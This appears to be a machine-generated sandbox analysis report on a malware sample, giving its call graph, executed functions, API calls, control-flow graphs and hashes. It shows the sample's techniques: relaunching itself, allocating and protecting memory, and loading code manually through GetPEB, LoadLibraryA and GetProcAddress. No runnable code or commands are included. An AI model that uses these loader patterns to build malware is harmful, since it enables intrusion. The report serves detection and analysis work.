5092->5093 5093->5091 5095 e5ddf6 5094->5095 5096 e5de2d 5094->5096 5140 e519ab 5095->5140 5098 e519ab 2 API calls 5096->5098 5100 e5de70 _snprintf 5098->5100 5099 e5de01 WideCharToMultiByte 5099->5096 5101 e5de97 5100->5101 5101->4772 5103 e5dca3 5102->5103 5104 e51a52 2 API calls 5102->5104 5145 e5db28 lstrlenW 5103->5145 5104->5103 5106 e5dcb2 5107 e51a52 2 API calls 5106->5107 5110 e5dcd1 5106->5110 5108 e5dcf1 _snwprintf 5107->5108 5108->5110 5109 e51a52 2 API calls 5111 e5dd20 _snwprintf 5109->5111 5110->5109 5112 e51b09 5111->5112 5113 e5dd49 DeleteFileW 5112->5113 5113->4774 5147 e51000 5114->5147 5119 e5e05b 5156 e510dc 5119->5156 5120 e51503 memset 5122 e5e00c GetTempPathW GetTempFileNameW 5120->5122 5124 e5108b memset 5122->5124 5123 e5e060 5123->4779 5123->4780 5125 e5e037 5124->5125 5125->5119 5126 e5108b memset 5125->5126 5127 e5e048 5126->5127 5127->5119 5128 e5108b memset 5127->5128 5128->5119 5130 e5e155 5129->5130 5131 e5e20b 5130->5131 5132 e51a52 2 API calls 5130->5132 5131->4783 5133 e5e16f _snwprintf 5132->5133 5134 e5e193 5133->5134 5137 e5e1ba 5134->5137 5161 e5de9c 5134->5161 5176 e5e068 GetModuleFileNameW 5137->5176 5141 e519cb 5140->5141 5144 e514f2 GetProcessHeap RtlAllocateHeap 5141->5144 5143 e519de 5143->5099 5143->5143 5144->5143 5146 e5db4c 5145->5146 5146->5106 5148 e51503 memset 5147->5148 5151 e5101b 5148->5151 5149 e51071 5154 e5108b memset 5149->5154 5150 e51040 GetFileAttributesW 5150->5151 5152 e51052 CreateDirectoryW 5150->5152 5151->5149 5151->5150 5152->5151 5153 e51064 GetLastError 5152->5153 5153->5149 5153->5151 5155 e510c8 5154->5155 5155->5119 5155->5120 5157 e51a52 2 API calls 5156->5157 5158 e510f5 _snwprintf 5157->5158 5159 e51b09 5158->5159 5160 e51119 DeleteFileW 5159->5160 5160->5123 5162 e5dec8 5161->5162 5163 e5ded0 GetLastError 5162->5163 5167 e5dfc0 5162->5167 5164 e5dee1 5163->5164 5163->5167 5180 e514f2 GetProcessHeap RtlAllocateHeap 5164->5180 5166 e5deea 5166->5167 5168 e5dfb3 5166->5168 5169 e5df1b GetTickCount 5166->5169 5167->5137 5175 e51532 GetProcessHeap HeapFree 5167->5175 5183 e51532 GetProcessHeap HeapFree 5168->5183 5173 e5df3a 5169->5173 5171 e5df67 GetLastError 5171->5173 5173->5168 5173->5171 5181 e514f2 GetProcessHeap RtlAllocateHeap 5173->5181 5182 e51532 GetProcessHeap HeapFree 5173->5182 5175->5137 5177 e5e0b6 lstrlenW 5176->5177 5178 e5e09f 5176->5178 5179 e5e0ce 5177->5179 5178->5177 5179->5131 5180->5166 5181->5173 5182->5173 5183->5167 5197 e51cc1 5198 e51cc4 5197->5198 5199 e51503 memset 5198->5199 5200 e51cd9 CreateProcessW 5199->5200 5201 e51cfc 5200->5201 5202 e51d03 5200->5202 5201->5202 5203 e51d0f CloseHandle CloseHandle 5201->5203 5203->5202 5247 e52561 GetProcessHeap RtlAllocateHeap 5238 e52f82 5239 e52d85 4 API calls 5238->5239 5240 e52faf 5239->5240 5241 e52d85 4 API calls 5240->5241 5242 e52fbd memcpy memcpy memset 5241->5242 5245 e53050 _memset 5242->5245 5244 e52d85 4 API calls 5246 e532bf 5244->5246 5245->5244 5249 e3d349 5256 e3b881 5249->5256 5251 e3d35a 5259 e3c473 5251->5259 5253 e3d35f 5254 e3d3f7 5253->5254 5262 e3b601 5253->5262 5266 e30c0c GetPEB 5256->5266 5258 e3c45f 5258->5251 5260 e30c0c GetPEB 5259->5260 5261 e3d335 5260->5261 5261->5253 5264 e3b60f 5262->5264 5263 e3b658 5263->5253 5264->5263 5268 e3b53f 5264->5268 5267 e30c21 5266->5267 5267->5258 5269 e3b54a 5268->5269 5272 e3b550 5268->5272 5269->5272 5273 e3b42f 5269->5273 5271 e3b577 5271->5264 5272->5264 5274 e3b43c 5273->5274 5277 e31743 GetPEB 5274->5277 5276 e3b46e 5276->5271 5277->5276 5278 e51855 5279 e51866 5278->5279 5280 e51922 5279->5280 5281 e51873 VirtualAlloc 5279->5281 5281->5280 5282 e51890 5281->5282 5290 e5151f memcpy 5282->5290 5284 e518f9 5292 e5179c 5284->5292 5286 e518b3 5286->5284 5291 e5151f memcpy 5286->5291 5289 e51913 VirtualFree 5289->5280 5290->5286 5291->5286 5293 e51819 5292->5293 5295 e517b0 5292->5295 5293->5280 5293->5289 5294 e517be LoadLibraryA 5294->5293 5294->5295 5295->5293 5295->5294 5296 e517ea GetProcAddress 5295->5296 5296->5293 5296->5295 5210 e534b3 5211 e534cc _memset 5210->5211 5212 e534d8 memset 5211->5212 5217 e52d85 memset 5212->5217 5215 e52d85 4 API calls 5216 e53529 5215->5216 5218 e52de6 5217->5218 5222 e52dbb 5217->5222 5223 e52af9 memset 5218->5223 5220 e52e32 5221 e52e68 memset memset 5220->5221 5221->5222 5222->5215 5224 e52b2c 5223->5224 5224->5220 5224->5224 5301 e51c13 5302 e51c27 5301->5302 5305 e5151f memcpy 5302->5305 5304 e51c31 5305->5304 5248 e5257d GetProcessHeap HeapFree 5184 e546ff 5185 e5d976 5184->5185 5186 e512cd GetPEB 5185->5186 5187 e5d9f6 5186->5187 5297 e3403e 5298 e3d2b5 5297->5298 5299 e3d335 5298->5299 5300 e30c0c GetPEB 5298->5300 5300->5299 5188 e5e5fa 5191 e5e5ff 5188->5191 5189 e5e628 WaitForSingleObject 5189->5191 5191->5189 5192 e5e66c 5191->5192 5195 e5192a VirtualFree 5191->5195 5196 e51532 GetProcessHeap HeapFree 5191->5196 5194 e5e647 CloseHandle 5194->5191 5195->5194 5196->5191

                                                                              Executed Functions

                                                                              Function 00E5DA0A, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63stringCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00E5DA2F
                                                                              • _snwprintf.NTDLL ref: 00E5DA5D
                                                                              • GetCommandLineW.KERNEL32 ref: 00E5DA6D
                                                                              • lstrlenW.KERNEL32(00000000), ref: 00E5DA76
                                                                              • lstrlenW.KERNEL32(?), ref: 00E5DA85
                                                                              • lstrcmpiW.KERNELBASE(00000000,?), ref: 00E5DA9A
                                                                              • ExitProcess.KERNEL32 ref: 00E5DAAB
                                                                                • Part of subcall function 00E51CC2: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00E51CF2
                                                                              • ExitProcess.KERNEL32 ref: 00E5DAD2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.229583434.0000000000E51000.00000020.00000001.sdmp, Offset: 00E51000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_e51000_corsangle.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Process$Exitlstrlen$CommandCreateFileLineModuleName_snwprintflstrcmpi
                                                                              • String ID: P
                                                                              • API String ID: 4243820956-4144668039
                                                                              • Opcode ID: 6a99b973afbabd0f67605543c87617d7061a6f82ec722276a44e4ae2cd533acb
                                                                              • Instruction ID: b006c6ea9c4a0e3300be5cbeb1bba26a0b26bb2aa2191434dc02450f02467870
                                                                              • Opcode Fuzzy Hash: 6a99b973afbabd0f67605543c87617d7061a6f82ec722276a44e4ae2cd533acb
                                                                              • Instruction Fuzzy Hash: B611B1725041189FDB21A7609C89BFF37BCEB40386F040598FA06B3152EE705D8D8BA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00E51CC2, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50processCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 20 e51cc2-e51cd1 21 e51cd9-e51cfa CreateProcessW 20->21 22 e51cd4 call e51503 20->22 23 e51d23 21->23 24 e51cfc-e51d01 21->24 22->21 27 e51d25-e51d2a 23->27 25 e51d03-e51d09 24->25 26 e51d0f-e51d21 CloseHandle * 2 24->26 28 e51d0a-e51d0d 25->28 26->28 28->27
                                                                              APIs
                                                                              • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00E51CF2
                                                                              • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00E51D12
                                                                              • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00E51D1B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.229583434.0000000000E51000.00000020.00000001.sdmp, Offset: 00E51000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_e51000_corsangle.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandle$CreateProcess
                                                                              • String ID: D
                                                                              • API String ID: 2922976086-2746444292
                                                                              • Opcode ID: f80b2709a782b9d9142faa1b5eab9d3fc3064ca850616da8167205731cac3181
                                                                              • Instruction ID: c50d2b4c499c60c1b060212734f9554951340885d5fa1a3857ff184e2b8feac2
                                                                              • Opcode Fuzzy Hash: f80b2709a782b9d9142faa1b5eab9d3fc3064ca850616da8167205731cac3181
                                                                              • Instruction Fuzzy Hash: 51F08172900008ABDB01DEA5DC04AEFB7B9EF45353B154865ED26F6110EBB499088690
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00E3002D, Relevance: 4.9, APIs: 3, Instructions: 392memoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 29 e3002d-e3009e call e30467 * 6 42 e300a0-e300a2 29->42 43 e300a7-e300b0 29->43 45 e3045f-e30466 42->45 43->42 44 e300b2-e300b6 43->44 44->42 46 e300b8-e300c2 44->46 47 e300e6-e30107 GetNativeSystemInfo 46->47 48 e300c4-e300c7 46->48 47->42 50 e30109-e30133 VirtualAlloc 47->50 49 e300c9-e300cf 48->49 51 e300d1-e300d4 49->51 52 e300d6 49->52 53 e30135-e3013d 50->53 54 e3016c-e30176 50->54 57 e300d9-e300e4 51->57 52->57 58 e3013f-e30142 53->58 55 e301b0-e301c1 54->55 56 e30178-e3017d 54->56 60 e301c3-e301dd 55->60 61 e30240-e3024c 55->61 59 e30181-e30194 56->59 57->47 57->49 62 e30144-e3014c 58->62 63 e3015d-e3015f 58->63 65 e30196-e3019f 59->65 66 e301a5-e301aa 59->66 82 e301df 60->82 83 e3022e-e3023a 60->83 67 e30252-e30269 61->67 68 e302fc-e30306 61->68 62->63 69 e3014e-e30151 62->69 64 e30161-e30166 63->64 64->58 70 e30168 64->70 65->65 71 e301a1 65->71 66->59 74 e301ac 66->74 67->68 75 e3026f-e3027f 67->75 72 e303c3-e303d7 68->72 73 e3030c-e30313 68->73 77 e30153-e30156 69->77 78 e30158-e3015b 69->78 70->54 71->66 134 e303d8 call e5dad8 72->134 135 e303d8 call e5da0a 72->135 79 e30315-e3031e 73->79 74->55 80 e302e1-e302f2 75->80 81 e30281-e30285 75->81 77->63 77->78 78->64 86 e30324-e3033e 79->86 87 e303b8-e303bd 79->87 80->75 84 e302f8 80->84 88 e30286-e30295 81->88 90 e301e3-e301e7 82->90 83->60 85 e3023c 83->85 84->68 85->61 91 e30340-e30342 86->91 92 e30358-e3035a 86->92 87->72 87->79 93 e30297-e3029b 88->93 94 e3029d-e302a6 88->94 95 e30207-e30210 90->95 96 e301e9 90->96 98 e30344-e30349 91->98 99 e3034b-e3034e 91->99 102 e30373-e30375 92->102 103 e3035c-e3035e 92->103 93->94 100 e302a8-e302ad 93->100 101 e302cf-e302d3 94->101 109 e30213-e30228 95->109 96->95 97 e301eb-e30205 96->97 97->109 113 e30350-e30356 98->113 99->113 114 e302c0-e302c3 100->114 115 e302af-e302be 100->115 101->88 110 e302d5-e302dd 101->110 111 e30377 102->111 112 e3037c-e30381 102->112 105 e30360-e30362 103->105 106 e30364-e30366 103->106 104 e303da-e303df 107 e303e1-e303e5 104->107 108 e3045d 104->108 116 e30379-e3037a 105->116 106->102 119 e30368-e3036a 106->119 107->108 117 e303e7-e303f1 107->117 108->45 109->90 120 e3022a 109->120 110->80 111->116 121 e30384-e303ae VirtualProtect 112->121 113->121 114->101 118 e302c5-e302cb 114->118 115->101 116->121 117->108 122 e303f3-e303f7 117->122 118->101 119->121 123 e3036c-e30371 119->123 120->83 121->42 124 e303b4 121->124 122->108 125 e303f9-e3040a 122->125 123->121 124->87 125->108 126 e3040c-e30411 125->126 127 e30413-e30420 126->127 127->127 128 e30422-e30426 127->128 129 e30428-e3043a 128->129 130 e3043e-e30444 128->130 129->126 131 e3043c 129->131 130->108 132 e30446-e3045c 130->132 131->108 132->108 134->104 135->104
                                                                              APIs
                                                                              • GetNativeSystemInfo.KERNELBASE(?,?,?,?,00E30005), ref: 00E300EB
                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00E30005), ref: 00E30113
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.229558668.0000000000E30000.00000040.00000001.sdmp, Offset: 00E30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_e30000_corsangle.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocInfoNativeSystemVirtual
                                                                              • String ID:
                                                                              • API String ID: 2032221330-0
                                                                              • Opcode ID: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                                                                              • Instruction ID: 2b9317a772186e5201a87ab3dc280c6e94c7a91c3c472f639c1a7ffc6bffd037
                                                                              • Opcode Fuzzy Hash: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
                                                                              • Instruction Fuzzy Hash: 69E1D271A043068FDB24CF29C8A876ABBE0FF94318F18552DE895AB341E774ED45CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00E51CC1, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44processCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 136 e51cc1-e51cfa call e51503 CreateProcessW 140 e51d23 136->140 141 e51cfc-e51d01 136->141 144 e51d25-e51d2a 140->144 142 e51d03-e51d09 141->142 143 e51d0f-e51d21 CloseHandle * 2 141->143 145 e51d0a-e51d0d 142->145 143->145 145->144
                                                                              APIs
                                                                              • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00E51CF2
                                                                              • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00E51D12
                                                                              • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00E51D1B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.229583434.0000000000E51000.00000020.00000001.sdmp, Offset: 00E51000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_e51000_corsangle.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandle$CreateProcess
                                                                              • String ID: D
                                                                              • API String ID: 2922976086-2746444292
                                                                              • Opcode ID: 452b06fae0bbfe96eed8713116867b1e57048ded8e9350cdfd7be69bf92e600e
                                                                              • Instruction ID: 784b07457712a79d193607a24a89b4bc98cc5110e5211fa26c44e1d8bd3fd6ec
                                                                              • Opcode Fuzzy Hash: 452b06fae0bbfe96eed8713116867b1e57048ded8e9350cdfd7be69bf92e600e
                                                                              • Instruction Fuzzy Hash: BCF0B4729000086BDB11CEA59C05EFFB7BDEF85362B154469ED16FB100EBB49D09C6A0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Non-executed Functions

                                                                              Function 00E328C1, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 416COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.229558668.0000000000E30000.00000040.00000001.sdmp, Offset: 00E30000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_e30000_corsangle.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _memset
                                                                              • String ID: 0
                                                                              • API String ID: 2102423945-4015486719
                                                                              • Opcode ID: 8a404c312162383c4e114af5c0eaaf5718992d507ad079db318c2d82cc2ce286
                                                                              • Instruction ID: edff83673a840e5e0a046df3e6d1e248845e75a3039019b6ed34b0437eaaf72f
                                                                              • Opcode Fuzzy Hash: 8a404c312162383c4e114af5c0eaaf5718992d507ad079db318c2d82cc2ce286
                                                                              • Instruction Fuzzy Hash: BE02373090066AEFCB1ACF68C8996FAFFB0FF44304F14116DC695A7642D732A965CB94
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%